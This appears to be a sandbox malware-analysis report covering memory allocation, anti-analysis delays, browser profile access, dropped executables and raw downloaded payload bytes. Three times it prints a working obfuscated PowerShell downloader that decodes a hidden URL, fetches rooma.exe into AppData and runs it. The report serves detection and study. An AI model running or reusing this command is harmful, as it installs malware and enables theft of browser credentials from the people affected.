NtAllocateVirtualMemory May 24, 2024, 9:37 a.m.	process_identifier: 2104 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02503000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2024, 9:37 a.m.	process_identifier: 2104 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02504000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2024, 9:37 a.m.	process_identifier: 2104 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02505000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2024, 9:37 a.m.	process_identifier: 2104 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02506000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2024, 9:37 a.m.	process_identifier: 2104 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02507000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2024, 9:37 a.m.	process_identifier: 2104 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02508000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2024, 9:37 a.m.	process_identifier: 2104 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02509000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2024, 9:37 a.m.	process_identifier: 2104 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04990000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2024, 9:37 a.m.	process_identifier: 2104 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04991000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2024, 9:37 a.m.	process_identifier: 2104 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04992000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2024, 9:37 a.m.	process_identifier: 2104 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04993000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2024, 9:37 a.m.	process_identifier: 2104 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04994000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2024, 9:37 a.m.	process_identifier: 2104 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04995000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2024, 9:37 a.m.	process_identifier: 2104 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04996000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2024, 9:37 a.m.	process_identifier: 2104 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04997000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2024, 9:37 a.m.	process_identifier: 2104 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04998000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2024, 9:37 a.m.	process_identifier: 2104 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04999000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2024, 9:37 a.m.	process_identifier: 2104 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0499a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2024, 9:37 a.m.	process_identifier: 2104 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0499b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2024, 9:37 a.m.	process_identifier: 2104 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0499c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2024, 9:37 a.m.	process_identifier: 2104 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0499d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2024, 9:37 a.m.	process_identifier: 2104 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0499e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2024, 9:37 a.m.	process_identifier: 2104 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0499f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2024, 9:37 a.m.	process_identifier: 2104 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x049e0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2024, 9:37 a.m.	process_identifier: 2104 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x049e1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2024, 9:37 a.m.	process_identifier: 2104 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x049e2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2024, 9:37 a.m.	process_identifier: 2104 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x049e3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2024, 9:37 a.m.	process_identifier: 2104 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x049e4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

A process attempted to delay the analysis task. (1 event)

description

netbtugc.exe tried to sleep 160 seconds, actually delayed analysis time by 160 seconds

Steals private information from local Internet browsers (4 events)

file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\
file	C:\Users\test22\AppData\Local\Chromium\User Data
file	C:\Users\test22\AppData\Local\MapleStudio\ChromePlus\User Data
file	C:\Users\test22\AppData\Local\Yandex\YandexBrowser\User Data

Creates executable files on the filesystem (2 events)

file	C:\Users\test22\AppData\Roaming\rooma.exe
file	C:\Users\test22\AppData\Local\Temp\sqlite3.dll

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (2 events)

cmdline

powershell.exe -ExecutionPolicy UnRestricted function LQhlh($iAXOUnjQ, $bjGcHEb){[IO.File]::WriteAllBytes($iAXOUnjQ, $bjGcHEb)};function zkkoODnkdOXlr($iAXOUnjQ){if($iAXOUnjQ.EndsWith((KgQIevZJx @(47125,47179,47187,47187))) -eq $True){rundll32.exe $iAXOUnjQ }elseif($iAXOUnjQ.EndsWith((KgQIevZJx @(47125,47191,47194,47128))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $iAXOUnjQ}elseif($iAXOUnjQ.EndsWith((KgQIevZJx @(47125,47188,47194,47184))) -eq $True){misexec /qn /i $iAXOUnjQ}else{Start-Process $iAXOUnjQ}};function fbUysIvJpUzDJbgt($WeuPtAwBrGuTyyLeSBEJ){$TPKepUYDmoAFjOHRfuEf = New-Object (KgQIevZJx @(47157,47180,47195,47125,47166,47180,47177,47146,47187,47184,47180,47189,47195));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$bjGcHEb = $TPKepUYDmoAFjOHRfuEf.DownloadData($WeuPtAwBrGuTyyLeSBEJ);return $bjGcHEb};function KgQIevZJx($eTHmOcKqIU){$kIWXaGUQZYbt=47079;$PDFpjjruzXwZezIX=$Null;foreach($QNJiuRDs in $eTHmOcKqIU){$PDFpjjruzXwZezIX+=[char]($QNJiuRDs-$kIWXaGUQZYbt)};return $PDFpjjruzXwZezIX};function iMoBwPUgEkDDhYs(){$bzNVNMxsa = $env:AppData + '\';$fLaod = $bzNVNMxsa + 'rooma.exe'; if (Test-Path -Path $fLaod){zkkoODnkdOXlr $fLaod;}Else{ $movKnuBo = fbUysIvJpUzDJbgt (KgQIevZJx @(47183,47195,47195,47191,47137,47126,47126,47129,47127,47125,47135,47133,47125,47128,47129,47135,47125,47129,47129,47130,47126,47193,47190,47190,47188,47126,47193,47190,47190,47188,47176,47125,47180,47199,47180));LQhlh $fLaod $movKnuBo;zkkoODnkdOXlr $fLaod;};;;;}iMoBwPUgEkDDhYs;

cmdline

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function LQhlh($iAXOUnjQ, $bjGcHEb){[IO.File]::WriteAllBytes($iAXOUnjQ, $bjGcHEb)};function zkkoODnkdOXlr($iAXOUnjQ){if($iAXOUnjQ.EndsWith((KgQIevZJx @(47125,47179,47187,47187))) -eq $True){rundll32.exe $iAXOUnjQ }elseif($iAXOUnjQ.EndsWith((KgQIevZJx @(47125,47191,47194,47128))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $iAXOUnjQ}elseif($iAXOUnjQ.EndsWith((KgQIevZJx @(47125,47188,47194,47184))) -eq $True){misexec /qn /i $iAXOUnjQ}else{Start-Process $iAXOUnjQ}};function fbUysIvJpUzDJbgt($WeuPtAwBrGuTyyLeSBEJ){$TPKepUYDmoAFjOHRfuEf = New-Object (KgQIevZJx @(47157,47180,47195,47125,47166,47180,47177,47146,47187,47184,47180,47189,47195));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$bjGcHEb = $TPKepUYDmoAFjOHRfuEf.DownloadData($WeuPtAwBrGuTyyLeSBEJ);return $bjGcHEb};function KgQIevZJx($eTHmOcKqIU){$kIWXaGUQZYbt=47079;$PDFpjjruzXwZezIX=$Null;foreach($QNJiuRDs in $eTHmOcKqIU){$PDFpjjruzXwZezIX+=[char]($QNJiuRDs-$kIWXaGUQZYbt)};return $PDFpjjruzXwZezIX};function iMoBwPUgEkDDhYs(){$bzNVNMxsa = $env:AppData + '\';$fLaod = $bzNVNMxsa + 'rooma.exe'; if (Test-Path -Path $fLaod){zkkoODnkdOXlr $fLaod;}Else{ $movKnuBo = fbUysIvJpUzDJbgt (KgQIevZJx @(47183,47195,47195,47191,47137,47126,47126,47129,47127,47125,47135,47133,47125,47128,47129,47135,47125,47129,47129,47130,47126,47193,47190,47190,47188,47126,47193,47190,47190,47188,47176,47125,47180,47199,47180));LQhlh $fLaod $movKnuBo;zkkoODnkdOXlr $fLaod;};;;;}iMoBwPUgEkDDhYs;

Drops an executable to the user AppData folder (2 events)

file	C:\Users\test22\AppData\Roaming\rooma.exe
file	C:\Users\test22\AppData\Local\Temp\sqlite3.dll

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW May 24, 2024, 9:37 a.m.	show_type: 0 filepath_r: powershell.exe parameters: -ExecutionPolicy UnRestricted function LQhlh($iAXOUnjQ, $bjGcHEb){[IO.File]::WriteAllBytes($iAXOUnjQ, $bjGcHEb)};function zkkoODnkdOXlr($iAXOUnjQ){if($iAXOUnjQ.EndsWith((KgQIevZJx @(47125,47179,47187,47187))) -eq $True){rundll32.exe $iAXOUnjQ }elseif($iAXOUnjQ.EndsWith((KgQIevZJx @(47125,47191,47194,47128))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $iAXOUnjQ}elseif($iAXOUnjQ.EndsWith((KgQIevZJx @(47125,47188,47194,47184))) -eq $True){misexec /qn /i $iAXOUnjQ}else{Start-Process $iAXOUnjQ}};function fbUysIvJpUzDJbgt($WeuPtAwBrGuTyyLeSBEJ){$TPKepUYDmoAFjOHRfuEf = New-Object (KgQIevZJx @(47157,47180,47195,47125,47166,47180,47177,47146,47187,47184,47180,47189,47195));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$bjGcHEb = $TPKepUYDmoAFjOHRfuEf.DownloadData($WeuPtAwBrGuTyyLeSBEJ);return $bjGcHEb};function KgQIevZJx($eTHmOcKqIU){$kIWXaGUQZYbt=47079;$PDFpjjruzXwZezIX=$Null;foreach($QNJiuRDs in $eTHmOcKqIU){$PDFpjjruzXwZezIX+=[char]($QNJiuRDs-$kIWXaGUQZYbt)};return $PDFpjjruzXwZezIX};function iMoBwPUgEkDDhYs(){$bzNVNMxsa = $env:AppData + '\';$fLaod = $bzNVNMxsa + 'rooma.exe'; if (Test-Path -Path $fLaod){zkkoODnkdOXlr $fLaod;}Else{ $movKnuBo = fbUysIvJpUzDJbgt (KgQIevZJx @(47183,47195,47195,47191,47137,47126,47126,47129,47127,47125,47135,47133,47125,47128,47129,47135,47125,47129,47129,47130,47126,47193,47190,47190,47188,47126,47193,47190,47190,47188,47176,47125,47180,47199,47180));LQhlh $fLaod $movKnuBo;zkkoODnkdOXlr $fLaod;};;;;}iMoBwPUgEkDDhYs; filepath: powershell.exe	1	1	0

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory May 24, 2024, 9:37 a.m.	process_identifier: 1460 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x7ef80000 process_handle: 0xffffffff	1	0	0

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses May 24, 2024, 9:37 a.m.	flags: 15 family: 0		111	0

URL downloaded by powershell script (4 events)

Data received	ÁèÂ@ÒÁ+ÂuAù')\|Ý¸?Å%C÷îÁúòÁîòuíMu¶0¶A0F¶A0F¶A0Fë¤$¸ó§-4÷ïÁúúÁïúuí_^]ÃñU·¿K-Uìì¹kS3Ûÿ¸8pà÷éÑÁúÊÁéÊuë3ÀEø9EãMÁVMðWÿE¿vWEìEÿ¹$¾§»çb¸d4L÷ïÁúúÁïúuí¸¶¾ ÷éÁúÊÁéÊuíUþ¶zø¶¶Á¶ÀÀÂPWEôè!Ä¸D&¹öd$;ñLñHuøEô¸ëQ÷ëÁúÚÁëÚuí¶ÁMð2EÿMìEø@Eø;E,ÿÿÿ_^CÃ%yHÈø@uCû/\|æ[å]Ã§Èéhó,!ÏÐìUìM3À8td$@<uù@PÿuQè¾òÿÿÄ]ÃF!ÇdRëåÕØUìM3Àf9tI@f<AuøEPÿuQèòÿÿÄ]ÃÌÌUìjÿuèÃ÷ÿÿÄÀt@]Ã3À]Ã ¸UìMW}ÀtVÑ÷fRfvÀuï^3À8t I\|@uö3ÉfG_]Ã(!9ÖýÂ6?áõ:UìUEVuö~Wø+ú NRöó_^]ÃçóY8YæßÃUìMÉt¶EiÀVñW}Áéó«Îáóª_^E]ÃÌÌé«ûÿÿ»Ü¡Å/à¯-UìQVuöu3À^å]Ã~u2~ÆFtèèúÿÿ¯FëèÝúÿÿFÇF@]ÇFb"ÇF @NÑÁ%ÿÿÁê3ÐF5Aýÿÿ#ÁNÁàSÁê3ÐÙÁÁèã>3ØF$5A}G#ÁNÁàWÁë3ØùÁ%ÿÁï 3øF5A}Gÿ#ÁV^ÁàÁï3ø~UüV òÁîÂ%þÿ3ðEÁî H(ñA}ÿÿ#ÊÁá 3ñp 3÷3ó3uü_Ñî[Æ^å]ÃÌUìSVuWÇØÇÌ¿¸øÇì¹¸øÇä±¸øÇðÁ¸øÆÈVè¹þÿÿÄÈd$¶Á;Er ;Eîöu3Éëç~u2~ÆFtèùÿÿ¯FëèùÿÿFÇF@]ÇFb"ÇF @NÙÁ%ÿÿÁë3ØF5Aýÿÿ#ÁNÁàùÁë3ØÁÁèç>3øF$5A}G#ÁNÁàÑÁï3øÁ%ÿÁê 3ÐF5A}Gÿ#ÁN ÁàÁê3ÐÁÁèEÁ%þÿ1EF(Ám 5A}ÿÿ#ÁMÁà 3ÈN 3Ê3Ï3Ë^~VÑééÿÿÿ_^Á[]Ã4xW(ãNÙUìMUS[]Ã¨YÐxpã±F;XPÃH£ÑÂbÀVwN¹üÎÃÑuì®PÂ^lå ó÷ÉÍÅe1éÈíØìÙÈëx« Îúx #,>uÈ'Mèå5Ãá(ã@hE÷ gýmNKóCtÍ3Ãu,±wzPÌEP\|FFn0mFYey>ÁË8eÈîÖÍD@»>ù bëúXÖó+qîà¢R·ûcyÂíóþùþlÅ_¹^9'ÃL£oÆ\|Z.®Ò§>PÅ¥>îft¯0ýèÙm`uSâ@~:¡ÊØ× fï£Tk#õ+{2ÏyQï8Sâ¥È3 áy@<H¯9¥Ád(îÊJM¤Fù[s§Ñäo²ù&,*y'Lê¼H¡;1^§t.,Ñ©ï´Fw¬1Hj;Lïjsaá%ÃÅÜ'ú;68äiç¿æpí6aý-Þ¿®° »d9ÚgbìråÆ«Ò&çPj±%Xg0÷xMUÅGÝ Q7,6U=µsô§>»¿ä* oUc -ÀÀ+tó¾Ö4w¸àÌwgH³9i1¶î=t/7üqé`ÿÝæ¨á¶·yÑó¿úÇ=æN»ßg¶]¥¤X¦û0g0¹2?u²Ì4m¶VcóvRsWE±ÇK(ÅzÜ>8E)$N/xï=t$¿Ü"ÂréÐhµ7ó§@o¾,ë,Ï{§ârNåX¡°dõ~ä¬#¶U\ÞëÈ#\|§{ú8%°§Ò·£Ê6wþN°~7MÊÒ\|M.È7«Vöz ôTÃÂSSøÃ-KfÏÄlQ3gk&·c©i;ê 5G=ßòO1L+ÃÌOH!¨º;»j½0²$d ©¼û(©ª0ÈØ/¶:ÐÅÐ+8ÓAægÑTÅÄª~Q3Ò_ÁKlt.¨'¨^ÞoTs#zóÆGù'õD!ólr<ÿÌüîÓ)WÆZkNl¡ u'È¾¤{Áþ!°QBL k`³M=dÅbMý°¹òÜFKP!ªâÄõAÀëk¦\|Kc°çÄcDtUiÅ(ÉUH (@ ¤m1NYÍ!ÿîâí?É>Ý½>¾Ò§L¢h¸úÑs\ÊöÊC¿`Rß0FÞ·äß6}5ÑØÈ/(H_Ð{<ÍteòÞËSaDG'ÝÂ¯ÛKë/g aUxB-ÎþõKÀÃðHßÝÙxòkõè;ëoÅC¥RRi¾¢("¢àÖÿ T«^Är²ë/rçêÀè:¾Ë ç )GH2Ôa¥.ò&+óâÛ-¥ÙÜ©o®©å9iÿ(!+ k¡o©9[NY)?ú»ØZº£6¸¦a/9aâÁ0RýUºFöþùÛ'F2¿SÓ1#òàîT¯kÀ5q¬©ÖÿTÛs}N÷ÛúU b ÜàsëJn¯ÐÊ;Êtêóá§àav¤¤ØÃåV}ò4gñ¥×´TòxêY`ZFæÄ0æmkAfä¦;ÿ/$tÇL3¡/Â'} ` :Ã²T<>X,ð/½t~9ìóµ`;ÈÙ#3®ÌÙ1îÇßw(Î0}N81nbÈ,ÀiÓ6·séîã7<&a÷éö ^/@¡>×KÔjJ{BÔôïÛ½V~ÆzÀ¦wE°ÙÃÚá~nÓÚ5Vh°=Bsg/Y¼þ:j^BZ[Û³[KÓry.; G£ãL7:[T²¾´§?'o2E¥ãD¸\|eÎiG»:»N¸´ËqçeãT¡2ÄwÆéÎº~ktI'¡,WXåh/ÏÁøÎS®Z6ó4=IBð o5,<¸\|´7^ü'ºL. Çp»Öâ%¦»ãVÚ+\|`çéò´ÞÈ3änÒOH\+ÙBößá'èR>HS6¬@Qw}µVDBÕÞüÁK×¦Bl8OÕp"L.A3¾û½æ;¢õ1xqñI"ÃY\|ìMªüµéöNªqÆõV+C·E¦} zÑïîyouNö¯rGÇ«¤¯ãìûJgg1Ò6·á«\|OgtCBæxqíÅTì,`×!T\|ðç2=çÊÄ;{9_xÄE¶}n Í>Îbúâåæ6¿àX<â6Jq[xL{Â±Áécá«$>ô¿ÔKw/X¹ò{£lDîT}§ÐÈþ\ÓmI/ÜÁa¡[ûáp$ñFïÆäÝTvÁé¹%7äDÃ}=8AXAu;?.\slà?Ð*èGÅxü©\|TL¥ÝiRÀÒ_×Z,á5F÷åÿð[ÙVWQSw 8]^³¨÷Yq¨õ×®ë# \|CÑXaïüuÒPÐé7àÅÌ_çq-YäÎ8 à+Ã~®ëí\Í`Y¯ì+Å+Kã
Data received	³íRHPðëAcÔàW6ù{Õ½T÷.~a¬¨¨}`CÐAùsR%«vÐ¿SôO $®ÿàüRLØôdUÖ¿÷^GîdËcã:æH¡%¹S+YÝiÜCèu¢KuûcßÃEÿfÝñvê UØÐ-¡ ýBÀãúzìæ¨²9ï?MBïdòíÞeKÆ\7'JnusJÓyO¨ó¥X7> Hz hjVõORàïÛÉÏgã·Tfó@:;ËæXCvÖ %5gêjEÃcõé¡çÊÚàMh~ÂäQ°èÿ R: º¿êOV-47D5 G;»p9àtñzeÖ[ã»%Ä¸·TRÒycgðÃÉ}6w¥8ý« ärÔéSWpå×uÇÞ²lCñ3w§åÙ° ìS®á 5ÈëÆÂ¡I.³Ø~-ÛÅJ@ã±æ³yi¶Õýßp@ùä\ÿìÇê´euò¸Åc£m¡ïÜ§~jÖÃôK\|["ÛXúem/3ÌAcF!î)÷_îº\¨\|¤W.ÌÉç'$iô}. /åû,½Vç²AÀ3ý¦ð¬k¿>Ø47«%m÷úW ÐGhÕªÉióê+T4} `k¡0,Øñw1^éð°Û~Õr#w[½ÚuÎ}Aìerl£yÿ2^DÍb ±ÊÞÿäºÖ°ZÄí/(ÆUä¸³<r<L$6j,`9]·ÛwuW<æRö£ìªçcô5ÉfFW5ÏÖ®¨M@É6/vô+WÉ`¨±4ÓÑC]F ]ô« ÌÕ<þíÌuäâÁ?=Kt.p-Û§Okf©\å`ôæsX\úIb[Õø'öæÀÏ3Ý9ôÊÎ»R¦ÜEk±¦-</ÏfñkvdzX%Û[3þðÝl¼"º¡SrÃóÀoUE`MýÞ\wA¹v0\|%ùEC~hµó"[AÚ¢ØÈ°¤$61j`7½£80á2÷ßVF¦K:Ðf1 1Ä¨aWíS;ÆsÂÐ½ºFÖN5VÌVºM«P<;9.4WZJ¥îxÓïgí?G?sÐÐ.J¾ô³Û¥Ñòì×y_l½ì±®úK¶ó1çbPÎ`÷'æ4~2~ÝXðz-ÁòÒÑ/ÃSlÓJÝVÆ@ÿ0~ÎO;y»ú§y`póñÑð¢¨³¬ØæÁÅ Â¦µT=Ð72Ñßù9´¾çÏÒv®+Zr§à5S3³w}{§ØTpÍãx?^øl÷Ägeìá`$ÿìý[½Zº&?oyVþîÆ¾\'8¿G3l¬Õ6Ã¥¤1¡Ú\OzÏæ}BG²æ×®8DæòÀ¢Ýü¶3çõJâ ]¾@dÝ\¹Ó²@"½yÿÃõug°{_nÇÎÊJ oècµPïÍÍâ .ù'g\|% é9Ík§ÐZnfÇÝ³5l?0É»w2]éÖ^f©¾/âù!kÝ'=Xòµ-,ö7~`axÒ@ú Ù¬cÂ°ïq°vÆÎs}kójX/ù¿Ï¥iª)ò¡ÄýÄZS:bu¨úÌ÷¸mÃ÷+¸:<§/CPîTUÖ¢?ÛqDêmR>r]T¡å^ÜÊ=ÏòÐeÆ8__[}Nôã ÐrA ¼ªJùkÙ=#tòvÓè¥çLÉSfîÚøÏ=éÜ:ùÍH¬-bÐ¡òÿ#x@ÌÅ¢Ö?ÿ¶ÃÛv¾ý?Ð©Ó"ÂmÊtJ¦\|ñùèÜ¾\|ô¢×pæ2íÁ ç²Ù>¢aøÝùT¸ZÐ½µdlÖêWrâïy{¤`µjdiÙ © bó>I ¶2÷´\g©#n¬$ÔT¶ýPÈg.üÒº~t¿îCàðe¦RÙ2Uõu·w2é·×ä>\|ÜWä2_«y VËÛ\¸IòlÌ4Ü.GÃ@QMQ\| åÚ0jcÐÓÒPPÞÆÕ3ç<x»]Ù<ÛDGF {#ß½´Ðq?ÀðéZ´P·,²³ÍuµXEþÒS²Y/ÄLÁÿãÝñÈpTrüá¼Y25÷§5ÏËug ¬nåÙ:ç²nNq³%1Ú[Ê&$\í_(${%GÁ§ÇÙ£þÙ?´nÖ¸h`f4"1¤Iæ0ù¾N@I gá35{û9±Øð¨H^QVÅPñ¡9D(à³ãÙm±aô¡ãàoø9-Ñ$u`;=óçR± ¡fúþEáGÆosjÿÁ³¥B%³¶úÀfw\ýÌ}ÛªÛöq]úÅiôq<¶gIêoëu·öå¿üúWè9) Þâïû\|sÿ³$9ï:§pó¥²c&ü Âuç¢l}ØbüN(°XIÔØBF>v¸ËFÃA'Ùß8íq§!>ù[[¸Ñ+Q[Ô^¸HÍÂ^×2zÖsThyDÔâ?q·· ¾EÉ!=s±cIaÞß÷ÌCzMô§¾´¤è(4,Ç»y ¬¡<ïMÅÖBÛuìÇÝJX?oSªö÷·XØXÕs")¦Å!³¬2tIûÆÍÞäòÌN´®µbÉ}CW6Ô¥úyò¦Íú¬ûå8îG]$Gl8H]þíÉçâhÕkºwRax²½îæ$ú«Ðß¦Ö%9³ÿ+¿~®ZÊ®FLL°Ê&1±:m¼@Ý¹Ý`à3ºÈ-y° iðÉð¨ÙÎ¢VÁû~ê¶£ýÅöë¡ 1¼ì>çßríqôõKwî2q®½xö:F C'bxã<¯¿¦ï{'PSÛ`[LI>v0TeØ?I(Ã#4b@õÉÇjtÀsAÙ®ÏÊ2 ÚéäÓINêÐjþ-'_¨^_Å8¹E=ÿÇ¥iá^q¬ßáZKÚY=GV,]þq§Î\|3¤Æ3ÇóÂÒq\7ÛfYólV&h îê4LøXèÆ,E8§ØOÌ5Æ0aãr!ô)O/[ ®C°`)Áý ¢}äN=º^¯b¤¦ÜfÆð¯¬R#Ä¶÷L&/-$³¦ÛC¦ù¾£Ï\|µ°g]û ]¶·òí4SôÜ¸±p¨kÛvS8<}O> N3Q@ù)ÿÎâÀ´ÙN£(Í4Ðù/^Hd®ØU3GáB48×8FÔØFFOëeÏÝã3iÔnÑµ!¬2m±ò#ÍF I°+é¿ø^}Ç)×ÔF>Qb HyåÒö1ïù .ú]Zâ ò;uÙ]°ÂÕ(ÖUj#0aGdj un×öE\|ï=Ü§[vy¢Ë;ÜBæR2oçì/xÂ¨Ç7ãO·cû">C §^;1Â¡ç@À]T>§ËxcwÉ?¹Í<àêZD¼V(Ê.½(ÝsÄQ`GæF£µ¼øh¦§GcJî°¥uePhãIÑÊLKU§;&e¾d{é±;öWugÓ]¶yç`ß` ×DMdEgÉËí¯U×¤ `îõ¼Y÷5a+æ8¢:3L$Ï<TÛ#á-¢¿ØÆÕbßý²Ö7'±ûa¤,ôsãí¼¨<À¼<?(Ç SD#!täîN¸®9Ó0:p÷+zòm;ó ã'ÕÁBÿ¥lõrÿ£°ç¤(I¬²g@G¬Îå(Ôª:Õ!Hôí2æ 